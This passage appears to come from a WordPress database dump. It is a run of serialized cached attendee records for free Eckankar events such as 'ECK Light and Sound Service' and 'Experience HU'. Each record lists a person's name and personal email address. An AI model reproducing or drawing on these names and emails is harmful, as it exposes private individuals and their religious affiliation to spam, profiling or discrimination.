Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1681036200:1681039800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1681036200;s:20:\"ticket_timestamp_end\";i:1681083000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438026,'FZE83069_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:15:\"Beth Massengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1681036200:1681039800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1681036200;s:20:\"ticket_timestamp_end\";i:1681083000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438027,'NXB88494_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1681036200:1681039800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1681036200;s:20:\"ticket_timestamp_end\";i:1681083000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438028,'YEL51667_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"Kery Colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1679831100:1679835600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1679831100;s:20:\"ticket_timestamp_end\";i:1679835600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438029,'SLK33746_cached','a:1:{i:0;a:24:{s:5:\"email\";s:31:\"shannon.everett2018@outlook.com\";s:4:\"name\";s:15:\"Shannon Everett\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1678617000:1678663800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1678617000;s:20:\"ticket_timestamp_end\";i:1678663800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438030,'PNU33974_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"elainedahl@yahoo.com\";s:4:\"name\";s:15:\"Elaine Dahlgren\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1678617000:1678663800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1678617000;s:20:\"ticket_timestamp_end\";i:1678663800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438031,'ADP84617_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"suesmith332@gmail.com\";s:4:\"name\";s:9:\"Sue Smith\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1678617000:1678663800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1678617000;s:20:\"ticket_timestamp_end\";i:1678663800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438032,'WNA72525_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"gai.lawson@gmail.com\";s:4:\"name\";s:10:\"Gai Lawson\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1678617000:1678663800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1678617000;s:20:\"ticket_timestamp_end\";i:1678663800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438033,'SUN77604_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn Gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1678617000:1678663800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1678617000;s:20:\"ticket_timestamp_end\";i:1678663800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438034,'SQN40282_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"joanna3064@gmail.com\";s:4:\"name\";s:6:\"Joanne\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1678617000:1678663800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1678617000;s:20:\"ticket_timestamp_end\";i:1678663800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438035,'OXD16051_cached','a:1:{i:0;a:24:{s:5:\"email\";s:26:\"colleynadanler@hotmail.com\";s:4:\"name\";s:15:\"Colleyna Danler\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1678617000:1678663800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1678617000;s:20:\"ticket_timestamp_end\";i:1678663800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438036,'TOH14609_cached','a:1:{i:0;a:24:{s:5:\"email\";s:17:\"rhoann9@gmail.com\";s:4:\"name\";s:13:\"Rhonda Miller\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1678617000:1678663800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1678617000;s:20:\"ticket_timestamp_end\";i:1678663800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438037,'AZK42289_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"ocekenedili@yahoo.com\";s:4:\"name\";s:11:\"Chukwuebuka\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1678617000:1678663800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1678617000;s:20:\"ticket_timestamp_end\";i:1678663800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438038,'GHT23161_cached','a:1:{i:0;a:24:{s:5:\"email\";s:29:\"lifedreamssolutions@gmail.com\";s:4:\"name\";s:7:\"Jessica\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1678617000:1678663800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1678617000;s:20:\"ticket_timestamp_end\";i:1678663800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438039,'JMG89836_cached','a:1:{i:0;a:24:{s:5:\"email\";s:26:\"lifedreamsvision@gmail.com\";s:4:\"name\";s:20:\"Darlene  Montgomery \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1678617000:1678663800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1678617000;s:20:\"ticket_timestamp_end\";i:1678663800;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438040,'VRP48575_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"musickidd28@gmail.com\";s:4:\"name\";s:12:\"Micah Ingram\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1678012200:1678059000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1678012200;s:20:\"ticket_timestamp_end\";i:1678059000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438041,'PKA72335_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1678012200:1678059000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1678012200;s:20:\"ticket_timestamp_end\";i:1678059000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438042,'CKL91840_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"ocekenedili@yahoo.com\";s:4:\"name\";s:11:\"Chukwuebuka\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1678012200:1678059000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1678012200;s:20:\"ticket_timestamp_end\";i:1678059000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438043,'THO64273_cached','a:1:{i:0;a:24:{s:5:\"email\";s:25:\"ponyexpressmama@yahoo.com\";s:4:\"name\";s:5:\"LeAnn\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1678012200:1678059000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1678012200;s:20:\"ticket_timestamp_end\";i:1678059000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438044,'XWY27893_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"elainedahl@yahoo.com\";s:4:\"name\";s:15:\"Elaine Dahlgren\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1678012200:1678059000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1678012200;s:20:\"ticket_timestamp_end\";i:1678059000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438045,'DFL79438_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:5:\"Beth \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1676197800:1676244600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1676197800;s:20:\"ticket_timestamp_end\";i:1676244600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438046,'RMB80706_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"billybobak@yahoo.com\";s:4:\"name\";s:19:\"William Massengale \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1676197800:1676244600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1676197800;s:20:\"ticket_timestamp_end\";i:1676244600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438047,'HPX73073_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1676197800:1676244600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1676197800;s:20:\"ticket_timestamp_end\";i:1676244600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438048,'TBK90038_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"j_furmanek@msn.com\";s:4:\"name\";s:16:\"Justyna Furmanek\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1676197800:1676244600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1676197800;s:20:\"ticket_timestamp_end\";i:1676244600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438049,'UFZ39610_cached','a:1:{i:0;a:24:{s:5:\"email\";s:25:\"marilynmillarhu@gmail.com\";s:4:\"name\";s:14:\"Marilyn Millar\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1676197800:1676244600\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1676197800;s:20:\"ticket_timestamp_end\";i:1676244600;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438050,'BND81763_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"abbynagbe@gmail.com\";s:4:\"name\";s:4:\"Abby\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1674387900:1674392400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1674387900;s:20:\"ticket_timestamp_end\";i:1674392400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438051,'JET55973_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1674387900:1674392400\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1674387900;s:20:\"ticket_timestamp_end\";i:1674392400;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438052,'EPV44453_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"abbynagbe@gmail.com\";s:4:\"name\";s:4:\"Abby\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:24:\"Book Discussion - 